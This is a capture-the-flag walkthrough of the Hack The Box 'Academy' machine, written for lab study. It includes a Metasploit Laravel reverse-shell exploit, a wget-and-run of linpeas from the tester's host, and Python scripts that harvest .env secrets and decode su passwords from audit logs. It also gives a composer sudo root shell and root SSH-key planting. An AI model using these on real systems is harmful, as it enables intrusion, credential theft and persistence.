Machine Info
- OS: Linux
- Difficulty: Easy
- Points: 20
- Release: 07 Nov 2020
- IP: 10.10.10.215
Network Scanning
As with every machine, we start by running nmap to identify open ports and services. It reports the following:
- ssh:22
- http:80
- mysqlx:33060
nmap -p- -T4 -A 10.10.10.215
The nmap result shows the hostname "academy.htb", so we add it to /etc/hosts so that the name resolves to the target's IP address locally.
vi /etc/hosts
10.10.10.215 academy.htb
Enumeration
HTTP Enumeration
Let's start by enumerating the HTTP service on port 80. First we run gobuster to list the directories and files that exist on the web server. Its output includes an admin.php file that may be useful to us later.
gobuster dir --url http://academy.htb/ -w /usr/share/wordlists/dirb/common.txt
Then we browse the website to see what is there and find a home page with register and login pages. We register an account with Burp Suite intercepting the traffic between the browser and the web server so we can see what goes over the wire. In the registration request we change "roleid=0" to "roleid=1" before forwarding it. After the registration succeeds, the server redirects us straight to login.php, so we change login.php to admin.php in the request and forward it.
http://academy.htb
Now we log in to admin.php with the account we created. Once logged in, we find a subdomain named "dev-staging-01.academy.htb", so we add it to /etc/hosts as well.
vi /etc/hosts
10.10.10.215 academy.htb dev-staging-01.academy.htb
On the subdomain "dev-staging-01.academy.htb" we find sensitive information, including the "APP_NAME" and "APP_KEY" values, which we use in the exploitation step below.
Exploitation
The APP_NAME value tells us we are dealing with a Laravel application. We use searchsploit to look for available exploits and find an RCE exploit that is part of the Metasploit Framework.
searchsploit laravel
We start Metasploit, set the required options (the APP_KEY and VHOST found on the staging host, plus RHOSTS and LHOST), and run the exploit, which gives us a reverse shell. We then spawn a TTY shell so the session is more interactive.
msfconsole
search PHP Laravel Framework
use 0   (or: use exploit/unix/http/laravel_token_unserialize_exec)
options
set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=
set RHOSTS 10.10.10.215
set VHOST dev-staging-01.academy.htb
set LHOST 10.10.16.9
options
run
id
help
shell
Privilege Escalation
cry0l1t3
Next we need to escalate our privileges to root or to another user with higher privileges. Listing the home directory shows the users on this machine, and we notice the two users that were mentioned earlier on the admin page after we logged in, so we keep them in mind. A look at the Laravel documentation on laravel.com shows that the application's ".env" file holds its configuration, including credentials and other sensitive data. We therefore use the find command to locate ".env" files on the machine and find the password "mySup3rP4s5w0rd!!" in "/var/www/html/academy/.env".
cd /home
ls
find / -type f -name .env 2>/dev/null
cat /var/www/html/academy/.env
cat /var/www/html/htb-academy-dev-01/.env
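Laravel's .env file is a plain KEY=VALUE dotenv file, and the DB_PASSWORD found above is exactly the kind of value a find-and-cat sweep turns up. The following Python script is an added example, not code from the original writeup: it walks a directory tree the way the find command above does, parses each .env it meets (comments, an optional "export" prefix, quoted values and trailing comments included) and lists the keys whose names suggest credentials. The sample .env it writes to a temporary directory is constructed for the demonstration; only the DB_PASSWORD value is the one the writeup reports, and the APP_KEY in it is a placeholder, not the target's key.

```python
import os
import re
import tempfile

# Key names that usually hold secrets in Laravel-style .env files.
SECRET_KEY_RE = re.compile(r"PASSWORD|SECRET|KEY|TOKEN", re.IGNORECASE)
# A value wrapped in matching single or double quotes.
QUOTED_RE = re.compile(r"""^(['"])(.*?)\1""")


def parse_env(text):
    """Parse dotenv text into a dict.

    Handles blank lines, '#' comments, an optional 'export ' prefix,
    single/double quoted values and trailing comments on unquoted values.
    ${VAR} interpolation is left untouched.
    """
    env = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        if line.startswith("export "):
            line = line[len("export "):]
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        quoted = QUOTED_RE.match(value)
        if quoted:
            value = quoted.group(2)
        else:
            value = value.split(" #", 1)[0].rstrip()
        env[key] = value
    return env


def find_env_files(root):
    """Yield every file named .env below root, like `find root -name .env`."""
    for dirpath, _dirs, files in os.walk(root):
        if ".env" in files:
            yield os.path.join(dirpath, ".env")


def harvest_secrets(root):
    """Return {path: {key: value}} for credential-looking, non-empty keys."""
    findings = {}
    for path in find_env_files(root):
        try:
            with open(path, encoding="utf-8", errors="replace") as fh:
                env = parse_env(fh.read())
        except OSError:
            continue  # unreadable file: skip it, as cat would just error out
        secrets = {
            k: v for k, v in env.items()
            if SECRET_KEY_RE.search(k) and v.lower() not in ("", "null")
        }
        if secrets:
            findings[path] = secrets
    return findings


# Constructed sample mirroring a Laravel .env. DB_PASSWORD is the value the
# writeup found; APP_KEY is a placeholder and everything else is illustrative.
SAMPLE_ENV = """\
APP_NAME=Laravel
APP_ENV=local
APP_KEY=base64:EXAMPLEKEYEXAMPLEKEYEXAMPLEKEYEXAMPLEKEY00=
APP_DEBUG=true
# database settings
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD="mySup3rP4s5w0rd!!"
MAIL_PASSWORD=null
"""


def build_sample_tree():
    """Create a temporary web root holding one .env plus a decoy; return the root."""
    root = tempfile.mkdtemp(prefix="www-")
    app = os.path.join(root, "html", "academy")
    os.makedirs(app)
    with open(os.path.join(app, ".env"), "w", encoding="utf-8") as fh:
        fh.write(SAMPLE_ENV)
    with open(os.path.join(root, "html", "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php echo 'hello';")
    return root


if __name__ == "__main__":
    for path, secrets in harvest_secrets(build_sample_tree()).items():
        print(path)
        for key, value in secrets.items():
            print(f"  {key} = {value}")
```

Pointing harvest_secrets() at /var/www on the target reproduces the manual find/cat step in one call; the same function, run from a periodic secrets-scanning job, is how a defender catches a readable .env before an attacker does. Note that the DB password it surfaces here is also the SSH password reused in the next step, which is the real weakness.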
We then try the password over SSH for the "cry0l1t3" and "mrb3n" users. It works for cry0l1t3, and we get the user flag.
ssh cry0l1t3@10.10.10.215
id
cat user.txt
mrb3n
Now we need to escalate once more. We transfer the linpeas script from our Kali machine to the target (via wget, nc, scp, etc.) and run it. Looking through its output, we notice the password of the "mrb3n" user, "mrb3n_Ac@d3my!", in "/var/log/audit/audit.log.3", stored hex-encoded in the data field of an audit record.
# On kali terminal (Python 2; with Python 3 use: python3 -m http.server)
python -m SimpleHTTPServer
# On target terminal
cd /tmp
wget http://10.10.16.9:8000/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
We can also find mrb3n's password manually by grepping the files in "/var/log/audit" for the su command, then taking the value of the data field and decoding it from hex to ASCII, which gives the same password linpeas found.
cd /var/log/audit
cat * | grep 'comm="su"'
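The records linpeas and the grep above hit are auditd TTY records: when pam_tty_audit is enabled (and configured to log passwords), every keystroke a user types into a program such as su is stored hex-encoded in the record's data field, the password included. The following Python script is an added example rather than code from the original writeup: it parses audit records, keeps the TTY records for a given comm, and decodes the keystroke buffer, honouring the trailing newline and any backspaces so the result is the line the program actually received. The log lines it operates on are constructed for the demonstration and mimic the audit.log format; the decoded su password is the one the writeup found.

```python
import re

# An auditd record is "type=NAME msg=audit(ts:serial): k=v k=v ..."; values
# are either bare tokens or double-quoted strings.
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_record(line):
    """Split one auditd line into a dict of field name -> value (quotes removed)."""
    return {key: value.strip('"') for key, value in FIELD_RE.findall(line)}


def decode_tty_data(hexdata):
    """Decode the hex keystroke buffer pam_tty_audit puts in a TTY record.

    The buffer ends with the newline (0A or 0D) that submitted the input and
    may contain Backspace/DEL (08/7F) if the user corrected a typo; both are
    applied so the result is what the program actually received.
    """
    typed = bytearray()
    for byte in bytes.fromhex(hexdata):
        if byte in (0x08, 0x7F):
            if typed:
                typed.pop()
        elif byte in (0x0A, 0x0D):
            break
        else:
            typed.append(byte)
    return typed.decode("utf-8", errors="replace")


def extract_typed_input(lines, comm="su"):
    """Return [(uid, comm, decoded input)] for TTY records of the given command."""
    results = []
    for line in lines:
        rec = parse_record(line)
        if rec.get("type") != "TTY" or rec.get("comm") != comm or "data" not in rec:
            continue
        results.append((rec.get("uid"), rec["comm"], decode_tty_data(rec["data"])))
    return results


# Constructed sample in audit.log format: a USER_CMD record, a TTY record for
# bash ("ls -la"), the su record holding the password the writeup found, and
# a second su record where the user typed an extra "n" and backspaced over it.
SAMPLE_AUDIT_LOG = """\
type=USER_CMD msg=audit(1597199290.000:80): pid=2518 uid=1002 auid=0 ses=1 msg='cwd="/home/cry0l1t3" cmd="ls" terminal=pts/0 res=success'
type=TTY msg=audit(1597199291.000:81): tty pid=2519 uid=1002 auid=0 ses=1 major=4 minor=1 comm="bash" data=6C73202D6C610A
type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
type=TTY msg=audit(1597199300.000:90): tty pid=2530 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E6E7F5F41634064336D79210A
"""


if __name__ == "__main__":
    for uid, comm, text in extract_typed_input(SAMPLE_AUDIT_LOG.splitlines()):
        print(f"uid={uid} comm={comm} typed={text!r}")
```

Feeding it the real files (for example extract_typed_input(open("/var/log/audit/audit.log.3"))) reproduces the grep-and-decode step in one pass. For a defender the same parser is the argument for leaving pam_tty_audit's password logging off and restricting read access to /var/log/audit: otherwise the audit trail doubles as a plaintext credential store readable by whoever can read the logs.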
We switch to the mrb3n user with su and the recovered password. To reach root we check mrb3n's sudo rights and find that he can run "/usr/bin/composer" as root.
su mrb3n
id
sudo -l
root
We look up composer on GTFOBins and find the following technique: composer runs the "scripts" defined in a composer.json through a shell, so with sudo those commands run as root. After applying it we get a root shell and the root flag.
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x
id
cd /root
ls
cat root.txt
Alternatively, we can change the script so that it appends our SSH public key to "/root/.ssh/authorized_keys", which gives a more reliable shell, and then log in as root over SSH with the matching private key. Note that the double quotes inside the JSON string have to be escaped as \" so that the file stays valid JSON.
# On target terminal
TF=$(mktemp -d)
echo '{"scripts":{"ssh":"mkdir -p /root/.ssh && echo \"put_ssh_public_key_here\" >> /root/.ssh/authorized_keys"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script ssh
# On kali terminal
ssh root@10.10.10.215 -i /root/.ssh/id_rsa
id
cd /root
cat root.txt